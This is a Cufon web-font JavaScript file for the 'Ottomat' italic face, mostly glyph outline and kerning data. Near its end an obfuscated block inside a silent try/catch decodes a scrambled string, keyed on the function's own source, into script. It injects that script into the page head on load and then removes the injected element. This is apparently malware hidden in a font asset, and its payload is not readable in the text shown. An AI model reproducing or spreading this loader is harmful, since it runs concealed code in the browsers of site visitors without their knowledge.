156,-409r77,16v-63,276,-190,508,-352,700r-63,-45v53,-62,101,-128,144,-198","w":475},{"d":"222,-409v-35,-1,-70,24,-69,59v0,21,31,51,95,90v64,39,96,83,96,133v2,82,-79,139,-163,139v-63,0,-117,-23,-161,-69r36,-54v35,33,76,49,125,49v43,1,86,-23,85,-65v0,-23,-31,-53,-94,-92v-63,-39,-95,-83,-95,-132v0,-104,127,-165,228,-115v26,13,49,29,68,51r-35,54v-28,-28,-65,-48,-116,-48","w":397},{"d":"553,-505v0,126,-130,229,-267,223r-108,0r-60,282r-84,0r141,-661v58,-19,110,-27,184,-29v107,-2,194,82,194,185xm472,-508v2,-107,-119,-123,-224,-101r-54,251r94,0v95,3,183,-63,184,-150","w":530,"k":{".":120,",":120}},{"d":"542,-476v72,0,137,66,120,147r-70,329r-80,0r72,-342v0,-34,-25,-62,-61,-62v-49,0,-99,71,-108,114r-61,290r-81,0r72,-342v0,-34,-25,-62,-61,-62v-49,0,-99,71,-108,114r-61,290r-81,0r102,-477r41,66v25,-32,72,-65,122,-65v53,0,95,34,112,74v28,-38,74,-74,131,-74","w":706},{"d":"12,-41v0,-29,24,-53,53,-53v29,0,53,24,53,53v0,29,-24,53,-53,53v-29,0,-53,-24,-53,-53xm94,-429v0,-29,24,-53,53,-53v29,0,53,24,53,53v0,29,-24,53,-53,53v-29,0,-53,-24,-53,-53","w":228},{"d":"531,-652r-482,663r-55,-40r482,-663","w":459},{"d":"160,-293v0,128,84,230,207,229v51,0,102,-18,152,-53r34,61v-58,45,-119,68,-183,68v-166,0,-292,-133,-292,-305v0,-235,222,-477,468,-375v37,16,70,41,98,73r-47,51v-41,-48,-96,-72,-163,-72v-144,-2,-274,169,-274,323","w":620,"k":{"y":22,"w":28,"v":28,"u":22,"t":12,"s":16,"q":32,"p":6,"o":36,"n":10,"g":24,"f":12,"e":36,"d":34,"c":36,"a":36,"Z":-10,"Y":16,"W":16,"V":16,"U":14,"T":10,"Q":32,"O":20,"G":32,"C":32}},{"d":"498,-444v-117,-35,-195,108,-120,196v20,24,44,35,72,35xm150,-340v3,170,135,290,314,290v57,0,111,-11,163,-32r18,56v-67,25,-138,38,-213,38v-189,0,-352,-163,-352,-352v0,-189,163,-352,352,-352v166,0,315,118,315,279v0,143,-120,261,-262,261v-119,0,-202,-69,-204,-180v-2,-116,112,-207,238,-168v19,6,38,14,55,25r-57,261v87,-15,164,-95,164,-197v0,-126,-120,-215,-249,-215v-155,0,-285,129,-282,286","w":767},{"d":"191,-680r67,0r-191,898r-67,0","w":252},{"d":"434,-616v-144,0,-274,169,-274,323v0,128,83,229,207,229v144,0,274,-169,274,-323v0,-128,-83,-229,-207,-229xm431,-692v166,0,292,133,292,305v0,200,-164,399,-353,399v-166,0,-292,-133,-292,-305v0,-200,164,-399,353,-399","w":749,"k":{"Z":32,"Y":60,"X":24,"W":42,"V":42,"T":36,"S":14,"Q":-12,"O":-12,"G":-12,"C":-12,"A":20}},{"d":"128,-203v0,77,53,141,126,141v92,0,170,-107,170,-205v0,-77,-53,-141,-126,-141v-92,0,-170,107,-170,205xm298,-482v116,0,204,94,204,214v0,141,-115,280,-248,280v-116,0,-204,-94,-204,-214v0,-141,115,-280,248,-280","w":546},{"d":"-22,104r500,0r-13,60r-500,0","w":478},{"d":"140,68r-76,0r-54,-68r68,0r145,-680r-68,0r82,-68r76,0","w":293},{"d":"269,-59v0,-89,-122,-86,-224,-83r96,-328r259,0r-16,74r-185,0r-54,187v118,-1,202,50,202,159v0,162,-199,270,-393,229r22,-68v147,24,293,-46,293,-170","w":430},{"d":"242,11v-109,-1,-178,-92,-178,-209v0,-227,181,-416,377,-454r16,67v-122,36,-212,110,-274,213v24,-21,57,-34,98,-35v101,0,175,77,175,181v0,121,-99,238,-214,237xm143,-184v0,67,40,121,101,121v70,0,134,-85,134,-160v0,-60,-41,-110,-98,-110v-78,0,-137,69,-137,149"},{"d":"48,-198r16,-74r294,0r-16,74r-294,0","w":394},{"d":"647,-680r-150,703r-277,-505r-102,482r-84,0r149,-700r277,504r103,-484r84,0xm850,-630v-51,0,-93,62,-93,121v0,44,26,84,67,84v51,-1,93,-62,93,-122v0,-44,-26,-83,-67,-83xm852,-687v75,0,131,61,131,138v0,93,-76,182,-161,181v-75,0,-131,-59,-131,-137v0,-94,75,-183,161,-182xm695,-242r97,-80r65,80r-162,0","w":959},{"d":"135,-481r-11,-175r66,-43r43,66r-81,155xm297,-481r-11,-176r67,-42r43,66r-81,155","w":362},{"w":225},{"d":"137,-117v-6,33,-2,63,15,88r-58,47v-32,-45,-45,-92,-32,-153r119,-557r79,0","w":248},{"d":"478,-470v-33,108,-103,188,-193,248r90,204r-71,31r-85,-191v-61,47,-109,104,-136,178r-83,0v32,-107,100,-185,189,-246r-92,-206r72,-31r86,194v62,-46,112,-107,140,-181r83,0","w":462},{"d":"128,-396r-68,0r182,-166r-19,92r77,0r-16,74r-77,0r-58,277v-6,33,-2,61,15,87r-59,48v-32,-45,-45,-92,-32,-153","w":278},{"d":"377,-312v19,-83,-75,-105,-137,-66v-23,14,-44,31,-59,54r-69,324r-78,0r147,-692r78,0r-57,269v40,-31,82,-47,127,-47v84,-1,145,68,126,159r-66,311r-78,0","w":503},{"d":"185,-70v220,24,395,-146,395,-346v0,-107,-97,-198,-202,-198v-45,0,-88,3,-131,10r-114,533v19,0,37,-1,52,1xm391,-689v147,0,270,125,270,273v0,242,-202,424,-449,424v-57,0,-116,-7,-175,-20r137,-646v67,-20,130,-31,217,-31","w":686,"k":{"y":-6,"x":10,"w":-5,"v":-5,"f":-10,"Z":42,"Y":56,"X":30,"W":38,"V":38,"T":48,"S":16,"J":12,"A":26}},{"d":"178,-236v0,107,26,193,66,270r-53,31v-106,-152,-127,-421,-20,-599v51,-85,114,-158,196,-211r35,48v-127,98,-224,256,-224,461","w":327},{"d":"278,-55v34,-1,58,-10,81,-24r19,67v-27,16,-60,26,-100,28v-52,2,-121,-36,-169,-36v-42,0,-82,8,-119,25r291,-401r-206,0r16,-74r334,0r-278,383v38,-3,93,34,131,32","w":417},{"d":"197,-359r-76,359r-79,0r71,-334v7,-38,2,-74,-17,-98r64,-54v28,36,48,75,37,127","w":249},{"d":"509,-343v31,0,98,26,137,26v25,0,49,-8,72,-24r23,65v-40,26,-75,34,-126,28v-27,140,-161,260,-324,260v-137,0,-236,-112,-236,-253v0,-120,93,-242,211,-242v64,0,112,49,110,110v-4,105,-120,204,-225,220v23,51,69,91,140,91v129,0,230,-96,248,-207v-41,-7,-71,-1,-102,21r-23,-65v31,-20,62,-30,95,-30xm267,-409v-85,1,-147,96,-132,193v72,-13,163,-86,163,-157v0,-22,-8,-36,-31,-36","w":753},{"d":"135,-481r-11,-175r66,-43r43,66r-81,155","w":199},{"d":"231,12v-99,0,-185,-74,-183,-172v2,-98,64,-169,138,-199v-26,-22,-45,-55,-46,-101v-2,-105,92,-194,195,-194v88,0,160,60,159,148v-1,78,-46,138,-100,166v37,26,63,66,64,126v3,123,-107,226,-227,226xm301,-383v60,0,115,-55,115,-118v0,-49,-33,-78,-84,-78v-60,0,-114,52,-114,114v0,55,28,82,83,82xm380,-210v0,-67,-42,-104,-109,-104v-75,0,-145,72,-145,150v0,65,44,102,109,102v77,0,145,-68,145,-148","w":514},{"d":"203,-318v-62,-54,-44,-146,-25,-227v15,-64,-1,-125,-36,-171r43,-32v60,61,85,140,67,240v-13,67,-42,153,10,203v-71,24,-74,106,-91,181v-20,89,-82,161,-160,192r-25,-45v74,-40,102,-125,119,-223v10,-55,51,-98,98,-118","w":306},{"d":"40,-41v0,-29,24,-53,53,-53v29,0,53,24,53,53v0,29,-24,53,-53,53v-29,0,-53,-24,-53,-53xm226,-692v48,0,39,71,32,116v-23,146,-68,282,-136,397v-19,-153,11,-352,51,-461v13,-35,32,-52,53,-52","w":251},{"d":"66,-423v35,-35,82,-57,149,-59v77,-2,139,62,138,136v-1,73,-55,126,-114,151v57,21,98,73,98,145v0,162,-199,270,-393,229r21,-68v147,24,294,-45,294,-170v0,-73,-85,-99,-167,-86r-10,-67v87,-10,193,-57,193,-134v0,-33,-28,-63,-63,-62v-47,1,-79,17,-106,41","w":411},{"d":"162,-491r-82,-56r98,-18r-17,-100r85,56r56,-82r18,98r100,-17r-56,85r82,56r-98,18r17,100r-85,-56r-56,82r-18,-98r-100,17xm328,-507v-1,-36,-25,-67,-64,-66v-36,1,-67,26,-66,64v1,36,26,67,64,66v36,-1,67,-25,66,-64","w":398},{"d":"275,-482v110,0,178,89,178,205v0,231,-178,419,-377,458r-16,-67v122,-36,212,-110,274,-213v-24,21,-57,34,-98,35v-101,0,-175,-77,-175,-181v0,-121,99,-238,214,-237xm374,-293v0,-63,-42,-115,-101,-115v-70,0,-134,85,-134,160v0,60,41,111,98,110v80,0,137,-71,137,-155"},{"d":"70,-93v69,4,61,89,22,137v-22,27,-47,53,-80,73r-20,-19v31,-21,55,-49,73,-85v-27,-2,-48,-25,-48,-53v0,-29,25,-55,53,-53","w":227},{"d":"229,-705r156,519r377,-520r-62,706r-81,0r40,-443r-301,423r-123,-423r-137,451r-78,-24","w":797,"k":{"Y":28,"X":12,"W":30,"V":30,"U":8,"T":15,"Q":10,"P":-5,"O":10,"G":10,"C":10,"A":-5}},{"d":"459,-275v0,205,-216,350,-425,262r145,-679r80,0r-52,245v125,-68,252,26,252,172xm381,-278v1,-68,-31,-121,-95,-121v-37,0,-69,11,-97,33r-64,301v143,23,256,-84,256,-213","w":505},{"d":"-22,26v43,-8,78,-41,86,-84r133,-622r83,0r-136,639v-14,74,-79,134,-156,144","w":275},{"d":"537,-220v-3,144,-153,232,-317,232v-62,0,-122,-11,-181,-33r136,-640v61,-19,124,-29,188,-29v84,0,157,73,157,157v0,72,-50,135,-109,150v69,14,128,82,126,163xm454,-218v3,-62,-54,-116,-116,-116r-149,0r-56,265v150,24,315,-20,321,-149xm437,-530v2,-49,-39,-88,-90,-87v-35,0,-68,3,-100,8r-42,199v119,8,228,-24,232,-120","w":580,"k":{"Z":26,"Y":84,"X":20,"W":76,"V":76,"U":18,"T":60,"S":16,"Q":10,"O":10,"G":10,"C":10}},{"d":"506,-405r59,-275r84,0r-145,680r-84,0r70,-328r-302,0r-70,328r-84,0r145,-680r84,0r-59,275r302,0","w":627},{"d":"545,-516v0,99,-80,168,-166,192v39,27,69,69,75,124r21,197r-82,9r-22,-205v-5,-54,-51,-99,-110,-98r-80,0r-63,297r-84,0r141,-661v58,-19,119,-29,184,-29v107,0,186,72,186,174xm463,-517v-1,-61,-49,-102,-119,-100v-30,0,-62,3,-96,8r-50,236r92,0v84,3,175,-65,173,-144","w":550,"k":{"y":6,"u":6,"s":10,"q":14,"o":14,"g":8,"e":14,"d":12,"c":14,"a":14,"Y":42,"W":40,"V":40,"U":22,"T":36,"S":10,"Q":12,"G":12,"C":12}},{"d":"52,-217v0,-127,96,-256,218,-253v42,0,81,11,116,32r55,-254r80,0r-130,606v23,-9,46,-20,68,-35r31,55v-57,45,-133,77,-227,78v-127,0,-211,-98,-211,-229xm130,-217v0,105,66,172,177,152r64,-302v-27,-21,-57,-32,-92,-32v-82,-1,-149,93,-149,182","w":531},{"d":"647,-680r-150,703r-277,-505r-102,482r-84,0r149,-700r277,504r103,-484r84,0","w":625},{"d":"87,2r-35,-70r353,-175r-278,-177r42,-64r382,248","w":599},{"d":"228,-301v37,-3,89,40,130,40v29,0,53,-9,71,-27r22,35v-18,32,-64,58,-111,61v-37,3,-89,-40,-130,-40v-29,0,-52,9,-71,26r-22,-33v18,-34,63,-59,111,-62","w":594},{"d":"243,21r-135,-698r81,-15r94,497r293,-497r70,42","w":574,"k":{"z":10,"y":18,"x":32,"w":6,"v":6,"u":18,"t":10,"s":24,"r":24,"q":44,"p":10,"o":48,"n":20,"m":24,"g":38,"f":16,"e":48,"d":45,"c":48,"a":48,"Z":10,"Y":-12,"W":-5,"V":-5,"T":-12,"S":-8,"Q":8,"O":8,"M":16,"G":8,"C":8,"A":78}},{"d":"225,-171v-42,29,-96,-9,-96,-55v0,-72,97,-137,151,-179v49,-38,72,-62,73,-63v63,-56,26,-153,-65,-148v-62,3,-105,27,-134,65r-40,-50v34,-51,96,-89,175,-91v101,-2,176,62,177,155v0,49,-22,95,-68,133r-71,55v-63,46,-123,72,-135,134v0,23,14,38,33,44xm98,-41v0,-29,24,-53,53,-53v29,0,53,24,53,53v0,29,-24,53,-53,53v-29,0,-53,-24,-53,-53","w":442},{"d":"344,-127v0,78,-73,142,-153,139r-20,94r-75,0r22,-103v-37,-11,-70,-31,-98,-60r36,-54v35,33,76,49,125,49v43,1,86,-23,85,-65v0,-23,-31,-53,-94,-92v-63,-39,-95,-83,-95,-132v-1,-73,66,-135,144,-132r20,-93r75,0r-22,106v31,12,58,30,79,55r-35,54v-28,-28,-65,-48,-116,-48v-35,-1,-70,24,-69,59v0,21,31,51,95,90v64,39,96,83,96,133","w":397},{"d":"411,-181v-76,20,-161,15,-229,-14r-122,207r-70,-42r403,-671r135,698r-81,15xm397,-255r-43,-232r-133,227v53,20,120,23,176,5","w":584,"k":{"z":-6,"y":20,"x":-16,"w":58,"v":58,"u":20,"t":14,"s":8,"q":22,"p":14,"o":22,"n":20,"l":10,"g":12,"f":8,"e":22,"d":20,"c":22,"a":32,"Y":100,"W":102,"V":102,"U":32,"T":60,"S":14,"Q":46,"O":46,"M":-5,"J":-5,"G":46,"C":46}},{"d":"524,-473r35,70r-353,175r278,177r-42,64r-382,-248","w":591},{"d":"297,-427r219,-273r63,51r-255,314r-71,335r-84,0r74,-348r-141,-317r74,-33","w":501,"k":{"z":12,"y":24,"x":42,"w":12,"v":12,"u":32,"t":20,"s":34,"r":28,"q":54,"p":26,"o":60,"n":28,"m":28,"g":48,"e":60,"d":54,"c":60,"a":60,"Y":-24,"W":-20,"V":-20,"T":-30,"S":-16,"Q":8,"O":8,"M":10,"G":8,"C":8,"B":-8,"A":78,".":32,",":32}},{"d":"246,-603r-40,190r232,0r-17,77r-232,0r-55,259r260,0r-16,77r-344,0r145,-680r330,0r-17,77r-246,0","w":475},{"d":"99,-429v0,-29,24,-53,53,-53v29,0,53,24,53,53v0,29,-24,53,-53,53v-29,0,-53,-24,-53,-53xm70,-93v69,4,61,89,22,137v-22,27,-47,53,-80,73r-20,-19v31,-21,55,-49,73,-85v-27,-2,-48,-25,-48,-53v0,-29,25,-55,53,-53","w":233},{"d":"449,-559v-70,-73,-258,-84,-258,42v0,82,136,150,192,204v46,44,68,92,68,142v0,156,-182,222,-327,161v-34,-15,-65,-35,-92,-62r41,-61v39,38,90,66,161,67v79,1,135,-33,135,-103v0,-86,-135,-154,-192,-209v-46,-44,-68,-91,-68,-139v0,-141,164,-215,297,-154v32,14,60,33,84,58","w":506,"k":{"Y":50,"X":6,"W":48,"V":48,"U":12,"T":35,"Q":10,"O":12,"G":12,"C":12,"A":-5}},{"d":"12,-41v0,-29,24,-53,53,-53v29,0,53,24,53,53v0,29,-24,53,-53,53v-29,0,-53,-24,-53,-53","w":222},{"d":"66,-272r14,-68r314,0r-14,68r-314,0xm36,-130r14,-68r314,0r-14,68r-314,0","w":418},{"d":"354,-531r-84,-163r73,-33r66,172","w":552},{"d":"50,-202v0,-166,159,-338,330,-261v26,12,48,30,67,53r-43,50v-28,-32,-64,-48,-107,-48v-91,-1,-169,107,-169,205v0,78,51,142,126,141v33,0,64,-12,93,-35r36,54v-32,31,-76,54,-132,55v-115,0,-201,-94,-201,-214","w":445}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+380-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("Y7;)>`R=[!^uYm%z1`My676^W-R);`^uW-&y[!X2;iLp{P=A{vEsWM~%;`%XXAEWiiXy!=5yRM])rC;u[2MCWCvs.7Bs1-^g&i(2Yr1z!2%Pv7=VWm^#KC~|.M^1Rr{E6)sA67~d17(BYC:~&AId$cBPYe5pr!&YK5(c;Bd4$%{f&BBL!vvzvyd^{7.AH2Rs>7%=Ym6AYc~}|rqpI#)AH2qp>#)sH`~%>`1=[m~2|!6u;A]2>C%s[C.^ax=z[!{:{A]T[P=TWAhfS21x1)suYrL:|P}P{!)%>2oy>-i-;!]IH`]pYcKT[c]qom#BM7C6&YH.RS|KXcrvi!W{;[>I1a$h(Ae5%`2:}bgpEuTs~yP=)-xd]VzL^4f=;WR=Y7~T{-M=[!^uH`(TIxXu{!)%Yc%`>x6:S-5L>#pgY-5};)Ee!-%1Wr)s!-%1$c5:Ycqh")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":517,"face":{"font-family":"Ottomat","font-weight":500,"font-style":"italic","font-stretch":"normal","units-per-em":"1000","panose-1":"0 0 0 0 0 0 0 0 0 0","ascent":"800","descent":"-200","x-height":"12","bbox":"-56 -748 983 242","underline-thickness":"0","underline-position":"0","slope":"-12","unicode-range":"U+0020-U+007E"}}));


